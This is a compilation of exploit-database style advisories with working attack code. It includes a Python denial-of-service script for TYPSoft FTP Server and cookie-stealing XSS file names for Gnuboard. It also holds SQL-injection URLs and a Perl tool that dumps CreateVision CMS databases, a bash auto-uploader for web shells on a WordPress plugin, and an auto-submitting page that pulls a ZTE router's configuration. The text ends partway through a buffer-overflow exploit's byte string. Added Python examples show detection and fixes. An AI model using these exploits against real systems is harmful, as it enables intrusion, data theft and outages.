source: https://www.securityfocus.com/bid/52554/info
TYPSoft FTP Server is prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
TYPSoft FTP Server 1.1.0 is vulnerable; other versions may also be affected.
#!/usr/bin/python
import socket, sys

if len(sys.argv) != 2:
    print '\n\t[*] Usage: ./' + sys.argv[0] + ' <target host>'
    sys.exit(1)

print '\n\t[*] TypesoftFTP Server 1.1 Remote DoS (APPE) by Brock Haun'
host = sys.argv[1]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Crash buffer: 'A../' followed by 100 'A' (0x41) bytes, 104 bytes in total
buffer = 'A../' + '\x41' * 100
print '\n\t[*] Sending crash buffer ("A../" + "\\x41" * 100).'
s.connect((host, 21))
data = s.recv(1024)
s.send('USER anonymous' + '\r\n')
data = s.recv(1024)
s.send('PASS anonymous' + '\r\n')
data = s.recv(1024)
s.send('APPE ' + buffer + '\r\n')
print '\n\t[*] Done! Target should be unresponsive!'
s.close()
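A detection-side companion to the advisory above: the crash is triggered by a single APPE command whose argument is far longer than any real file name, so an FTP control-channel log can be screened for overlong path arguments (and for "../" sequences, which the crash buffer also contains). This is an added example, not part of the original advisory or the script; the log format "timestamp client-ip COMMAND argument", the sample lines and the 64-byte threshold are all constructed assumptions.

```python
"""
Screen FTP control-channel log lines for overlong or traversal-style path arguments.
Assumed (constructed) log format: '<date> <time> <client-ip> <CMD> <argument>'.
"""
import re

# Constructed sample log; the last line mimics the 104-byte APPE argument
# ('A../' + 100 * 'A') described in the advisory.
SAMPLE_LOG = """\
2012-03-16 10:22:31 203.0.113.5 USER anonymous
2012-03-16 10:22:31 203.0.113.5 PASS anonymous
2012-03-16 10:22:32 203.0.113.5 CWD /pub
2012-03-16 10:22:33 203.0.113.5 APPE report.txt
2012-03-16 10:22:40 198.51.100.7 USER anonymous
2012-03-16 10:22:40 198.51.100.7 PASS anonymous
2012-03-16 10:22:41 198.51.100.7 APPE A../""" + "A" * 100 + "\n"

LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<ip>\S+) (?P<cmd>[A-Za-z]{3,4})(?: (?P<arg>.*))?$"
)

# Commands that take a path argument; these were the usual overflow sinks in old FTP daemons.
PATH_COMMANDS = {"APPE", "STOR", "RETR", "CWD", "MKD", "RMD", "DELE", "LIST", "NLST"}


def parse_line(line):
    """Split one log line into its fields, or return None for lines that do not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["cmd"] = rec["cmd"].upper()
    rec["arg"] = rec["arg"] or ""
    return rec


def find_suspicious(lines, max_arg_len=64):
    """Return one alert per path command whose argument exceeds max_arg_len
    (assumed threshold: far above a legitimate file name, well below the 104-byte
    crash buffer) or contains a '../' traversal sequence."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["cmd"] not in PATH_COMMANDS:
            continue
        reasons = []
        if len(rec["arg"]) > max_arg_len:
            reasons.append("overlong argument (%d bytes)" % len(rec["arg"]))
        if "../" in rec["arg"]:
            reasons.append("path traversal sequence")
        if reasons:
            alerts.append({"ip": rec["ip"], "cmd": rec["cmd"],
                           "arg_len": len(rec["arg"]), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in find_suspicious(SAMPLE_LOG.splitlines()):
        print("%s %s len=%d: %s" % (a["ip"], a["cmd"], a["arg_len"], "; ".join(a["reasons"])))
```

The threshold is deliberately much lower than the crash size so that the rule also catches probing with shorter buffers; tune it to the longest file name your users legitimately transfer.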
source: https://www.securityfocus.com/bid/52627/info
WebGlimpse is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
WebGlimpse versions prior to 20.20.0 are affected.
query=%27%26command+and+arguments+go+here%26%27
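The payload above only makes sense once the query value reaches a shell: the URL-decoded value opens with a single quote that closes whatever quoted argument the CGI built, and the ampersands then hand the remainder to the shell as separate commands. The following is an added example, not WebGlimpse's code: it decodes the advisory's query string, shows how it lands in a string-built command line, and contrasts that with an allowlist check plus an argv-style invocation that involves no shell. The "glimpse -i" command line is an assumed stand-in for whatever the CGI actually runs.

```python
"""
Command injection through a URL parameter: string-built command line beside
an allowlisted argv form. The 'glimpse -i <query>' template is an assumption.
"""
import re
from urllib.parse import unquote_plus

# Query string from the advisory.
ADVISORY_PAYLOAD = "query=%27%26command+and+arguments+go+here%26%27"

SHELL_META = set("&|;`$<>(){}\n")
SAFE_QUERY = re.compile(r"^[A-Za-z0-9 _.\-]{1,200}$")   # assumed allowlist for search terms


def decode_query(qs):
    """Extract and URL-decode the 'query' parameter (what the CGI sees)."""
    for pair in qs.split("&"):
        key, _, value = pair.partition("=")
        if key == "query":
            return unquote_plus(value)
    return ""


def build_command_unsafe(query):
    """Vulnerable pattern: the decoded value is spliced into a single-quoted shell
    argument. A quote inside the value terminates the literal early."""
    return "glimpse -i '%s'" % query


def unquoted_metachars(command_line):
    """Shell metacharacters that end up outside single-quoted regions, i.e. the ones
    /bin/sh would interpret rather than pass through to the program."""
    found, in_quote = [], False
    for ch in command_line:
        if ch == "'":
            in_quote = not in_quote
        elif not in_quote and ch in SHELL_META:
            found.append(ch)
    return found


def build_argv_safe(query):
    """Hardened pattern: validate against an allowlist, then pass the value as one
    argv element to subprocess.run(argv) (no shell), so metacharacters are inert."""
    if not SAFE_QUERY.match(query):
        raise ValueError("query contains characters outside the allowlist")
    return ["glimpse", "-i", query]


if __name__ == "__main__":
    q = decode_query(ADVISORY_PAYLOAD)
    print("decoded value :", q)
    print("unsafe command:", build_command_unsafe(q))
    print("interpreted by shell:", unquoted_metachars(build_command_unsafe(q)))
```

Quoting alone is not a fix (a value can always contain the quote character); the durable fix is to never hand user data to a shell and to validate it against what a search term may legitimately contain.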
source: https://www.securityfocus.com/bid/52622/info
Gnuboard is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user.
Gnuboard versions prior to 4.34.21 are vulnerable.
1) You can upload a file (e.g. a.txt) to the BBS.
2) You can download it through the following script call and see how the download link is built.
### vulnerable code #########################################################################################################################
javascript:file_download('./download.php?bo_table=test&wr_id=13&no=0&sca=&sfl=&stx=&sst=&sod=&spt=0&page=0', 'a.txt');
#############################################################################################################################################
3) You can also upload a file whose name contains XSS code. The following are examples:
- ');alert(document.cookie);//
- %27);alert(document.cookie);%2f%2f
- %27%29%3b%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%2f%2f
### vulnerable code #########################################################################################################################
javascript:file_download('./download.php?bo_table=test&wr_id=13&no=0&sca=&sfl=&stx=&sst=&sod=&spt=0&page=0', '');alert(document.cookie);//');
#############################################################################################################################################
4) The file name is inserted into the JavaScript call without escaping, so the injected code runs as part of the page's JavaScript.
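The root cause in step 4 is a context mismatch: a file name is dropped into a JavaScript string literal as if it were inert text. The following added example (not Gnuboard's code) reproduces the unescaped pattern next to a version that encodes the value as a JavaScript string literal, and uses a small "skeleton" check to show that the advisory's file name becomes code in the first case and stays data in the second. The shortened download URL and the helper names are constructed for the example.

```python
"""
Embedding an untrusted file name in a JavaScript call: raw interpolation versus
JS-string-literal encoding, with a check that tells code apart from data.
"""
import html
import json

URL = "./download.php?bo_table=test&wr_id=13&no=0"   # download URL from the advisory (shortened)
PAYLOAD_NAME = "');alert(document.cookie);//"        # file name from the advisory


def render_unsafe(url, filename):
    """Vulnerable pattern: raw interpolation into single-quoted JS string literals."""
    return "javascript:file_download('%s', '%s');" % (url, filename)


def js_string_literal(value):
    """Encode value as a JS string literal. json.dumps escapes quotes, backslashes and
    control characters; the extra replacements neutralise HTML-significant characters
    and the JS line terminators U+2028/U+2029 so the literal is also safe inside an
    inline <script> block."""
    s = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("/", "\\/"), ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        s = s.replace(ch, esc)
    return s


def render_safe(url, filename):
    """Fixed pattern: every dynamic value is a properly encoded JS string literal."""
    return "javascript:file_download(%s, %s);" % (js_string_literal(url),
                                                  js_string_literal(filename))


def render_href_attribute(url, filename):
    """When the javascript: URL goes into an HTML attribute, HTML-encode it as well:
    the outer (HTML) context needs its own encoding on top of the inner (JS) one."""
    return '<a href="%s">download</a>' % html.escape(render_safe(url, filename), quote=True)


def skeleton(js):
    """Blank out the body of every JS string literal. Whatever remains is code, so an
    injected file name shows up as extra code in the skeleton."""
    out, i, n = [], 0, len(js)
    while i < n:
        c = js[i]
        if c in "'\"":
            j = i + 1
            while j < n and js[j] != c:
                j += 2 if js[j] == "\\" else 1   # skip escaped characters
            out.append('""')
            i = j + 1
        else:
            out.append(c)
            i += 1
    return "".join(out)


EXPECTED_SKELETON = 'javascript:file_download("", "");'


def is_injected(js):
    """True if the rendered call contains code beyond the two-argument skeleton."""
    return skeleton(js) != EXPECTED_SKELETON


if __name__ == "__main__":
    print("unsafe, benign name :", is_injected(render_unsafe(URL, "a.txt")))
    print("unsafe, payload name:", is_injected(render_unsafe(URL, PAYLOAD_NAME)))
    print("safe,   payload name:", is_injected(render_safe(URL, PAYLOAD_NAME)))
```

Template engines usually provide exactly this per-context escaping; the point of the hand-rolled version is to show that HTML-escaping alone (which leaves `'` and `)` untouched) would not have stopped this file name.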
source: https://www.securityfocus.com/bid/52637/info
Vacation Packages is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/vacation-packages/demo.php?controller=Listings&action=search&listing_search=1&season=2'
source: https://www.securityfocus.com/bid/52646/info
WebGlimpse is prone to a path-disclosure vulnerability.
Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer.
WebGlimpse 2.18.7 is vulnerable; other versions may also be affected.
http://www.example.com/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=1
source: https://www.securityfocus.com/bid/52648/info
CreateVision CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/local/bin/perl
#
# Exploit Title: CreateVision CMS Database injection.
# Description: Virtually none of the variables are filtered.
# Google Dork: inurl:artykul_print.php
# Date: 2012/02/24
# Author : Zwierzchowski Oskar
# Software Link: http://www.createvision.pl/
# Version: All Version
# Security Risk: High
# Tested on: FreeBSD
# Greets: Grzegorz Stachowiak, Damian Blaszczyk, Borislav Kotov.
use strict;
use warnings;
use LWP::Simple;
sub main ()
{
my %config = (
'host' => '',
'columns' => ',3,4',
'column' => '',
'table' => ''
);
my %send = ();
getops(\%config);
getcolumn(\%config, \%send);
getuser(\%config, \%send);
getdatabase(\%config, \%send);
gettables(\%config, \%send);
otherdata(\%config, \%send);
return 0;
}
sub getdatabase ($$)
{
my $config = shift;
my $send = shift;
my $data;
$data = get $config->{host}.$send->{database};
analizedata($data, 'Database');
return ($config, $send);
}
sub getuser ($$)
{
my $config = shift;
my $send = shift;
my $data;
$data = get $config->{host}.$send->{user};
analizedata($data, 'User');
return ($config, $send);
}
sub gettables ($$)
{
my $config = shift;
my $send = shift;
my $data;
$data = get $config->{host}.$send->{column};
analizedata($data, 'Tables');
}
sub otherdata ($$)
{
my $config = shift;
my $send = shift;
my $data;
my $table;
my $column;
print "[+]\tIf you want to draw some data? (1 or 2)\r\n\r\n";
print "[1]\tYes\r\n";
print "[2]\tNo\r\n";
$data = <STDIN>;
chomp($data);
if ($data == 2)
{
exit 0;
}
else
{
print "[+]\tName of the table which you want to download (check the output.txt) :\r\n";
$table = <STDIN>;
chomp($table);
print "[+]\tGet column/s: (ex. column1,column2,column3)\r\n";
$column = <STDIN>;
chomp($column);
$column =~ s/,/,char(58),/g;
$send->{tables} = '/artykul_print.php?id=103+and+1=2+union+select+1,concat('.$column.')'.$config->{columns}.'+from+'.$table.'--';
$data = get $config->{host}.$send->{tables};
analizedata($data, 'MYDATA');
}
return 0;
}
sub analizedata ($$)
{
my $data = shift;
my $pref = shift;
my $table;
my $column;
my @columns = ('');
my @tables = ('');
while ($data =~ /<span class=\"tytul_artykulu\">(.*?)<\/span>/g)
{
if ($pref eq 'Tables')
{
($table, $column) = split(/:/, $1);
save($1, 'output.txt');
push(@columns, $column);
if ($table eq $tables[$#tables])
{
}
else
{
push(@tables, $table);
}
}
else
{
print "[+]\t[".$pref."][".$1."]\r\n";
save($1, 'output.txt');
}
}
if ($pref eq 'Tables')
{
print "[+]\t".$#columns." columns in ".$#tables." tables\r\n";
print "[+]\tResults has been saved into output.txt\r\n";
}
return 0;
}
sub getops ($)
{
my $config = shift;
if (!$ARGV[0] || $ARGV[0] !~ /http:\/\//)
{
print "[+]\tUsage: perl splo.pl http://host.com\r\n";
exit 0;
}
else
{
$config->{host} = $ARGV[0];
}
return $config;
}
sub getcolumn ($$)
{
my $config = shift;
my $send = shift;
my $data;
for (1..20)
{
incrcolum($config);
$send->{user} = '/artykul_print.php?id=105+and+1=2+union+select+1,user()'.$config->{columns}.'--';
$send->{database} = '/artykul_print.php?id=105+and+1=2+union+select+1,database()'.$config->{columns}.'--';
$send->{column} = '/artykul_print.php?id=105+and+1=2+union+select+1,concat(table_name,char(58),column_name)'.$config->{columns}.'+from+information_schema.columns--';
$data = get $config->{host}.$send->{user};
if (index($data, "<span class=\"tytul_artykulu\">") != -1)
{
return ($config, $send);
}
}
return $config;
}
sub incrcolum ($)
{
my $config = shift;
my @digits = split(/,/, $config->{columns});
my $data = (($digits[$#digits])+1);
$config->{columns} =~ s/$config->{columns}/$config->{columns},$data/g;
return $config;
}
sub save ($$)
{
my $data = shift;
my $file = shift;
open(FILE, ">>".$file."");
print FILE "".$data."\r\n";
close FILE;
return 0;
}
main();
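Both SQL-injection advisories above (the Vacation Packages "season" parameter and the CreateVision CMS "id" parameter that the Perl script drives with UNION SELECT) come down to the same defect: request data spliced into SQL text. The following added example, which is not code from either product, shows that pattern next to a parameterized query on an in-memory SQLite database. The table and column names are constructed for the demonstration.

```python
"""
String-built SQL beside a parameterized query, on a constructed SQLite schema.
"""
import sqlite3


def make_db():
    """Constructed sample schema: a listings table plus a second table that a
    string-built query can be made to reveal."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE listings (id INTEGER PRIMARY KEY, title TEXT, season INTEGER)")
    conn.executemany("INSERT INTO listings (title, season) VALUES (?, ?)",
                     [("Alpine week", 1), ("Beach week", 2), ("City break", 2)])
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users (name, pw_hash) VALUES ('admin', 'constructed-hash-value')")
    return conn


def search_vulnerable(conn, season):
    """The pattern behind both advisories: the value becomes part of the SQL text.
    A stray quote (season=2') is a syntax error, and a crafted value can append a
    UNION that pulls rows from another table into the listing output."""
    sql = "SELECT id, title FROM listings WHERE season = '%s'" % season
    return conn.execute(sql).fetchall()


def search_parameterized(conn, season):
    """Fix: the value travels as a bound parameter and is never parsed as SQL."""
    return conn.execute("SELECT id, title FROM listings WHERE season = ?", (season,)).fetchall()


def search_typed(conn, season):
    """Defense in depth for numeric parameters: coerce before binding, so anything
    that is not an integer is rejected at the edge instead of reaching the database."""
    try:
        season_int = int(season)
    except (TypeError, ValueError):
        raise ValueError("season must be an integer")
    return search_parameterized(conn, season_int)


def probe_error(conn, season):
    """True if the string-built query fails with a SQL syntax error for this input,
    which is the signal the advisory's trailing quote produces."""
    try:
        search_vulnerable(conn, season)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("season=2   (vulnerable):", search_vulnerable(db, "2"))
    print("season=2'  (vulnerable): syntax error =", probe_error(db, "2'"))
    print("season=2'  (parameterized):", search_parameterized(db, "2'"))
```

The error-on-quote behaviour is also why the advisory's single trailing quote is a useful regression test: after the fix, `season=2'` must return an empty result (or a validation error), never a database error page.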
#!/bin/bash
#
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4
# Google Dork : inurl:"/uploads/contact_files/"
# Exploit Author : Claudio Viviani
# Vulnerability discovered by : Claudio Viviani
# Script Written by : F17.c0de
# Software link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
# Version : 1.3.4
# Tested on : Kali Linux 1.1.0a / Curl 7.26.0
# Info: The "upload_file()" ajax function is affected by an unrestricted file upload vulnerability
# Response : {"status":"uploaded","filename":"YOURSHELL"}
# Shell location http://VICTIM/wp-content/uploads/contact_files/YOURSHELL
echo '
+---------------------------------------------------------------+
| |
| Wordpress N-Media Website Contact Form with File Upload 1.3.4 |
| |
+---------------------------------------------------------------+
| |
| Script by : F17.c0de |
| Vuln Discovered by : Claudio Viviani |
| Date : 15.04.2015 |
| Google Dork : inurl:"/uploads/contact_files/" |
| Vulnerability : "upload_file()" on admin-ajax.php |
| Description : Auto shell uploader |
| |
+---------------------------------------------------------------+
| No System is Safe |
+---------------------------------------------------------------+
'
echo -n -e "Path of your shell: "
read bd
echo -n -e "Victim address [ex: http://www.victim.com]: "
read st
sleep 1
echo
echo "Uploading Shell. . ."
echo
curl -k -X POST -F "action=upload" -F "Filedata=@./$bd" -F "action=nm_webcontact_upload_file" $st/wp-admin/admin-ajax.php
echo
echo
echo "Job Finished"
echo
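The advisory's point is that the plugin's upload handler accepts whatever file name and content the client sends and stores it under the web root, where a .php file is then executable. The following is an added example, not the plugin's code, of the server-side validation such a handler needs: an extension allowlist, a check that the file's leading bytes match that extension, rejection of embedded PHP tags, and a random server-side name so the client-chosen name (including any path or double extension) never reaches the filesystem. The allowed types and size limit are an assumed policy. In a WordPress AJAX handler the request should additionally be tied to a nonce (`check_ajax_referer`), which is outside this example.

```python
"""
Validation for an attachment upload: allowlisted extension, matching magic bytes,
no embedded PHP tags, random storage name. The type policy is assumed.
"""
import os
import re
import secrets

# Allowed extensions with the magic bytes a file of that type must start with.
ALLOWED_TYPES = {
    "pdf": (b"%PDF-",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
MAX_BYTES = 5 * 1024 * 1024
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


class UploadRejected(ValueError):
    pass


def validate_upload(client_filename, data):
    """Return the random server-side file name to store data under, or raise UploadRejected."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    # Use only the final path component; the client name is untrusted.
    base = os.path.basename(client_filename.replace("\\", "/"))
    if "." not in base:
        raise UploadRejected("missing extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected("extension not allowed: %s" % ext)
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match extension %s" % ext)
    if PHP_TAG.search(data):
        raise UploadRejected("embedded PHP tag")   # polyglot image/PDF carrying code
    # The stored name keeps only the validated extension, so 'x.php.jpg' becomes '<hex>.jpg'.
    return "%s.%s" % (secrets.token_hex(16), ext)


def save_upload(upload_dir, client_filename, data):
    """Validate and write. The upload directory must be configured so the web server
    serves it as static content only (no script execution); that is a separate control."""
    name = validate_upload(client_filename, data)
    path = os.path.join(upload_dir, name)
    with open(path, "xb") as fh:   # 'x' refuses to overwrite an existing file
        fh.write(data)
    return path


if __name__ == "__main__":
    for fname, content in [("report.pdf", b"%PDF-1.4\n%constructed"),
                           ("shell.php", b"<?php echo 'hi'; ?>"),
                           ("../x.php.jpg", b"\xff\xd8\xff\xe0<?php echo 1; ?>")]:
        try:
            print(fname, "->", validate_upload(fname, content))
        except UploadRejected as exc:
            print(fname, "-> rejected:", exc)
```

Magic-byte checks stop the trivial rename, not every polyglot; the layered answer is the combination of content checks, a random name with a fixed extension, and an upload directory from which the server will never execute code.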
/*
Exploit Title : ZTE remote configuration download
Date : 09 May 2015
Exploit Author : Daniel Cisa
Vendor Homepage : http://wwwen.zte.com.cn/en/
Platform : Hardware
Tested On : ZTE F660
Firmware Version: 2.22.21P1T8S
--------------------------
Config remote download
--------------------------
ZTE F660 Embedded Software does not check Cookies And Credentials on POST
method so
attackers could download the config file with this post method without
authentication.
*/
<html>
<body onload="document.fDownload.submit();">
<form name="fDownload" method="POST" action="http://192.168.1.1/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" enctype="multipart/form-data" onsubmit="return false;">
Request Sent....
<input type="hidden" name="config" id="config" value="">
</form>
</body>
</html>
#!/usr/bin/python
# Exploit Title: VideoCharge Vanilla BOF Exploit v3.16.3.04
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com
# Version: v3.16.3.04
# Tested on: Win XP3
# Software link:http://www.softpedia.com/get/Multimedia/Video/Encoders-Converter-DIVX-Related/Videocharge-Express.shtml#download
# Greetz: b33f,corelan,offsec,vulnhub,HUST510, packetstorm
#
# Notes: Copy the file created by the script into the videocharge folder
# Looks like the whole productline is messed. Same sploit for all versions
#
import struct
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
"\x61\x69\x6e\x3e\x0d\x0a\x3c\x56\x45\x52\x53\x49\x4f\x4e\x20\x63"
"\x75\x72\x76\x65\x72\x3d\x22\x33\x2e\x31\x36\x2e\x34\x2e\x30\x36"
"\x22\x2f\x3e\x3c\x46\x49\x4c\x45\x53\x3e\x0d\x0a\x3c\x50\x61\x74"
"\x68\x54\x6f\x4d\x65\x64\x69\x61\x46\x69\x6c\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x43\x3a\x5c\x50\x65\x61\x63\x68\x5c\x73\x61\x6d"
"\x70\x6c\x65\x5f\x6d\x70\x34\x27\x20\x74\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x3e"
"\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62\x6e\x61"
"\x69\x6c\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62"
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52"
"\x4d\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32"
"\x64\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f"
"\x46\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x63\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f"
"\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74\x65\x72\x6e\x4e\x61\x6d"
"\x65\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x46\x6f\x6c\x64\x65"
"\x72\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x46\x6f"
"\x6c\x64\x65\x72\x3e\x0d\x0a\x3c\x53\x6b\x69\x70\x52\x61\x6e\x67"
"\x65\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x6b\x69\x70\x52\x61\x6e\x67\x65"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x49\x74\x65"
"\x6d\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x49\x74\x65\x6d"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x41\x75\x64\x69\x6f\x53\x74\x72"
"\x65\x61\x6d\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x41\x75\x64\x69\x6f"
"\x53\x74\x72\x65\x61\x6d\x3e\x0d\x0a\x3c\x49\x6e\x63\x6c\x75\x64"
"\x65\x43\x68\x61\x70\x74\x65\x72\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x49\x6e\x63\x6c\x75\x64\x65\x43\x68\x61\x70\x74\x65\x72\x3e\x0d"
"\x0a\x3c\x55\x73\x65\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x73\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x55\x73\x65\x53\x75\x62\x46\x6f\x6c"
"\x64\x65\x72\x73\x3e\x0d\x0a\x3c\x2f\x50\x61\x74\x68\x54\x6f\x4d"
"\x65\x64\x69\x61\x46\x69\x6c\x65\x3e\x0d\x0a\x3c\x2f\x46\x49\x4c"
"\x45\x53\x3e\x0d\x0a\x3c\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x4d\x6f\x64\x65\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x75"
"\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e\x61\x6d\x65\x20\x76\x61"
